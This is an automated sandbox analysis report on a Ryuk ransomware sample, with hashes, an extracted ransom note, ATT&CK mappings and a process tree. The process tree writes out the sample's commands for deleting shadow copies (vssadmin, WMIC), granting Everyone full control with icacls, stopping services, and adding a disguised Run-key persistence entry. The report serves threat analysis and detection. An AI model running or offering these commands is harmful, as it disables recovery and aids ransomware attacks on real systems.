ryuk | 40b865d1c3ab1b8544bcf57c88edd30679870d40b27d62feb237a19f0c5f9cd1

Analysis

max time kernel
87s
max time network
136s
platform
windows10_x64
resource
win10-en-20211208
submitted
28-01-2022 10:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

860e50.exe
Size

196KB
MD5

484a2bcb1335ac97ee91194f4c0964bc
SHA1

ad11ed52ab33ad05eb9b1e9ade134ca1348acc81
SHA256

40b865d1c3ab1b8544bcf57c88edd30679870d40b27d62feb237a19f0c5f9cd1
SHA512

6e61612bd29425c5ab9b648fa83bc2d8616071247f8659aa316ab9d4adde0a9ceb9301737bb4216db223dfdd371106da75463f6d7e3a88e1c4cdd6c821f3935f

Score

10^/10

ryuk discovery persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RyukReadMe.html

Family

ryuk

Ransom Note

<html><body><p style="font-weight:bold;font-size:125%;top:0;left:0;"> [email protected] <br> </p><p style="position:absolute;bottom:0;right:1%;font-weight:bold;font-size:170%">balance of shadow universe</p><div style="font-size: 550%;font-weight:bold;width:50%;height:50%;overflow:auto;margin:auto;position:absolute;top:35%;left:40%;">Ryuk</div></body></html��

Emails

[email protected]

Extracted

Path

C:\Users\Admin\.oracle_jre_usage\RyukReadMe.html

Family

ryuk

Ransom Note

[email protected] balance of shadow universe Ryuk

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 13788 created 3760	13788	WerFault.exe	68

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 1 IoCs

pid	Process
3760	GlUzbEU.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2104	icacls.exe
3744	icacls.exe
3904	icacls.exe
2188	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\860e50.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GlUzbEU.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
13788	3760	WerFault.exe	68

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1168	vssadmin.exe
1996	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2748	860e50.exe
2748	860e50.exe
2748	860e50.exe
2748	860e50.exe
3760	GlUzbEU.exe
3760	GlUzbEU.exe
2748	860e50.exe
2748	860e50.exe
2748	860e50.exe
2748	860e50.exe
2748	860e50.exe
2748	860e50.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe
13788	WerFault.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2748	860e50.exe
Token: SeBackupPrivilege	3760	GlUzbEU.exe
Token: SeIncreaseQuotaPrivilege	2552	WMIC.exe
Token: SeSecurityPrivilege	2552	WMIC.exe
Token: SeTakeOwnershipPrivilege	2552	WMIC.exe
Token: SeLoadDriverPrivilege	2552	WMIC.exe
Token: SeSystemProfilePrivilege	2552	WMIC.exe
Token: SeSystemtimePrivilege	2552	WMIC.exe
Token: SeProfSingleProcessPrivilege	2552	WMIC.exe
Token: SeIncBasePriorityPrivilege	2552	WMIC.exe
Token: SeCreatePagefilePrivilege	2552	WMIC.exe
Token: SeBackupPrivilege	2552	WMIC.exe
Token: SeRestorePrivilege	2552	WMIC.exe
Token: SeShutdownPrivilege	2552	WMIC.exe
Token: SeDebugPrivilege	2552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2552	WMIC.exe
Token: SeRemoteShutdownPrivilege	2552	WMIC.exe
Token: SeUndockPrivilege	2552	WMIC.exe
Token: SeManageVolumePrivilege	2552	WMIC.exe
Token: 33	2552	WMIC.exe
Token: 34	2552	WMIC.exe
Token: 35	2552	WMIC.exe
Token: 36	2552	WMIC.exe
Token: SeBackupPrivilege	3684	vssvc.exe
Token: SeRestorePrivilege	3684	vssvc.exe
Token: SeAuditPrivilege	3684	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2552	WMIC.exe
Token: SeSecurityPrivilege	2552	WMIC.exe
Token: SeTakeOwnershipPrivilege	2552	WMIC.exe
Token: SeLoadDriverPrivilege	2552	WMIC.exe
Token: SeSystemProfilePrivilege	2552	WMIC.exe
Token: SeSystemtimePrivilege	2552	WMIC.exe
Token: SeProfSingleProcessPrivilege	2552	WMIC.exe
Token: SeIncBasePriorityPrivilege	2552	WMIC.exe
Token: SeCreatePagefilePrivilege	2552	WMIC.exe
Token: SeBackupPrivilege	2552	WMIC.exe
Token: SeRestorePrivilege	2552	WMIC.exe
Token: SeShutdownPrivilege	2552	WMIC.exe
Token: SeDebugPrivilege	2552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2552	WMIC.exe
Token: SeRemoteShutdownPrivilege	2552	WMIC.exe
Token: SeUndockPrivilege	2552	WMIC.exe
Token: SeManageVolumePrivilege	2552	WMIC.exe
Token: 33	2552	WMIC.exe
Token: 34	2552	WMIC.exe
Token: 35	2552	WMIC.exe
Token: 36	2552	WMIC.exe
Token: SeBackupPrivilege	2748	860e50.exe
Token: SeIncreaseQuotaPrivilege	4288	WMIC.exe
Token: SeSecurityPrivilege	4288	WMIC.exe
Token: SeTakeOwnershipPrivilege	4288	WMIC.exe
Token: SeLoadDriverPrivilege	4288	WMIC.exe
Token: SeSystemProfilePrivilege	4288	WMIC.exe
Token: SeSystemtimePrivilege	4288	WMIC.exe
Token: SeProfSingleProcessPrivilege	4288	WMIC.exe
Token: SeIncBasePriorityPrivilege	4288	WMIC.exe
Token: SeCreatePagefilePrivilege	4288	WMIC.exe
Token: SeBackupPrivilege	4288	WMIC.exe
Token: SeRestorePrivilege	4288	WMIC.exe
Token: SeShutdownPrivilege	4288	WMIC.exe
Token: SeDebugPrivilege	4288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4288	WMIC.exe
Token: SeRemoteShutdownPrivilege	4288	WMIC.exe
Token: SeUndockPrivilege	4288	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2748 wrote to memory of 3760	2748	860e50.exe	68
PID 2748 wrote to memory of 3760	2748	860e50.exe	68
PID 2748 wrote to memory of 3760	2748	860e50.exe	68
PID 2748 wrote to memory of 2352	2748	860e50.exe	30
PID 2748 wrote to memory of 1368	2748	860e50.exe	69
PID 2748 wrote to memory of 1368	2748	860e50.exe	69
PID 2748 wrote to memory of 1368	2748	860e50.exe	69
PID 1368 wrote to memory of 640	1368	net.exe	71
PID 1368 wrote to memory of 640	1368	net.exe	71
PID 1368 wrote to memory of 640	1368	net.exe	71
PID 2748 wrote to memory of 852	2748	860e50.exe	72
PID 2748 wrote to memory of 852	2748	860e50.exe	72
PID 2748 wrote to memory of 852	2748	860e50.exe	72
PID 852 wrote to memory of 2464	852	net.exe	74
PID 852 wrote to memory of 2464	852	net.exe	74
PID 852 wrote to memory of 2464	852	net.exe	74
PID 2748 wrote to memory of 2368	2748	860e50.exe	29
PID 2748 wrote to memory of 2728	2748	860e50.exe	9
PID 2748 wrote to memory of 3208	2748	860e50.exe	24
PID 2748 wrote to memory of 3216	2748	860e50.exe	23
PID 2748 wrote to memory of 3404	2748	860e50.exe	22
PID 2748 wrote to memory of 3668	2748	860e50.exe	21
PID 3760 wrote to memory of 2104	3760	GlUzbEU.exe	75
PID 3760 wrote to memory of 2104	3760	GlUzbEU.exe	75
PID 3760 wrote to memory of 2104	3760	GlUzbEU.exe	75
PID 3760 wrote to memory of 3744	3760	GlUzbEU.exe	76
PID 3760 wrote to memory of 3744	3760	GlUzbEU.exe	76
PID 3760 wrote to memory of 3744	3760	GlUzbEU.exe	76
PID 3760 wrote to memory of 3380	3760	GlUzbEU.exe	80
PID 3760 wrote to memory of 3380	3760	GlUzbEU.exe	80
PID 3760 wrote to memory of 3380	3760	GlUzbEU.exe	80
PID 3760 wrote to memory of 1168	3760	GlUzbEU.exe	79
PID 3760 wrote to memory of 1168	3760	GlUzbEU.exe	79
PID 3760 wrote to memory of 1168	3760	GlUzbEU.exe	79
PID 3760 wrote to memory of 340	3760	GlUzbEU.exe	83
PID 3760 wrote to memory of 340	3760	GlUzbEU.exe	83
PID 3760 wrote to memory of 340	3760	GlUzbEU.exe	83
PID 3380 wrote to memory of 2552	3380	cmd.exe	85
PID 3380 wrote to memory of 2552	3380	cmd.exe	85
PID 3380 wrote to memory of 2552	3380	cmd.exe	85
PID 340 wrote to memory of 3148	340	net.exe	87
PID 340 wrote to memory of 3148	340	net.exe	87
PID 340 wrote to memory of 3148	340	net.exe	87
PID 2748 wrote to memory of 3904	2748	860e50.exe	89
PID 2748 wrote to memory of 3904	2748	860e50.exe	89
PID 2748 wrote to memory of 3904	2748	860e50.exe	89
PID 2748 wrote to memory of 2188	2748	860e50.exe	90
PID 2748 wrote to memory of 2188	2748	860e50.exe	90
PID 2748 wrote to memory of 2188	2748	860e50.exe	90
PID 2748 wrote to memory of 1740	2748	860e50.exe	91
PID 2748 wrote to memory of 1740	2748	860e50.exe	91
PID 2748 wrote to memory of 1740	2748	860e50.exe	91
PID 2748 wrote to memory of 1996	2748	860e50.exe	92
PID 2748 wrote to memory of 1996	2748	860e50.exe	92
PID 2748 wrote to memory of 1996	2748	860e50.exe	92
PID 2748 wrote to memory of 3764	2748	860e50.exe	93
PID 2748 wrote to memory of 3764	2748	860e50.exe	93
PID 2748 wrote to memory of 3764	2748	860e50.exe	93
PID 2748 wrote to memory of 2996	2748	860e50.exe	94
PID 2748 wrote to memory of 2996	2748	860e50.exe	94
PID 2748 wrote to memory of 2996	2748	860e50.exe	94
PID 3764 wrote to memory of 4200	3764	net.exe	101
PID 3764 wrote to memory of 4200	3764	net.exe	101
PID 3764 wrote to memory of 4200	3764	net.exe	101

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2728

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3668

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3404

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:3216

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:3208

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2368

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2352

C:\Users\Admin\AppData\Local\Temp\860e50.exe
"C:\Users\Admin\AppData\Local\Temp\860e50.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748
- C:\Users\Admin\AppData\Local\Temp\GlUzbEU.exe
  "C:\Users\Admin\AppData\Local\Temp\GlUzbEU.exe" 8 LAN
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3760
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2104
- - C:\Windows\SysWOW64\icacls.exe
    icacls "D:\*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3744
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "WMIC.exe shadowcopy delet"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3380
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC.exe shadowcopy delet
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2552
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\System32\net.exe" stop "samss" /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:340
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "samss" /y
      4⤵
      PID:3148
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\GlUzbEU.exe" /f /reg:64
    3⤵
    PID:4376
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\GlUzbEU.exe" /f /reg:64
      4⤵
      Adds Run key to start application
      PID:4112
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 9172
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    PID:13788
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\System32\net.exe" stop "audioendpointbuilder" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "audioendpointbuilder" /y
    3⤵
    PID:640
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\System32\net.exe" stop "samss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "samss" /y
    3⤵
    PID:2464
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3904
- C:\Windows\SysWOW64\icacls.exe
  icacls "D:\*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2188
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "WMIC.exe shadowcopy delet"
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    WMIC.exe shadowcopy delet
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4288
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin.exe Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1996
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\System32\net.exe" stop "samss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3764
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "samss" /y
    3⤵
    PID:4200
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\860e50.exe" /f /reg:64
  2⤵
  PID:2996
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\860e50.exe" /f /reg:64
    3⤵
    - Adds Run key to start application
    PID:4296
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\System32\net.exe" stop "samss" /y
  2⤵
  PID:14936
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "samss" /y
    3⤵
    PID:15320
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\System32\net.exe" stop "samss" /y
  2⤵
  PID:16296
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "samss" /y
    3⤵
    PID:16308
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\System32\net.exe" stop "samss" /y
  2⤵
  PID:88868
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "samss" /y
    3⤵
    PID:88912
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\System32\net.exe" stop "samss" /y
  2⤵
  PID:94620
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "samss" /y
    3⤵
    PID:95072

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3684

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads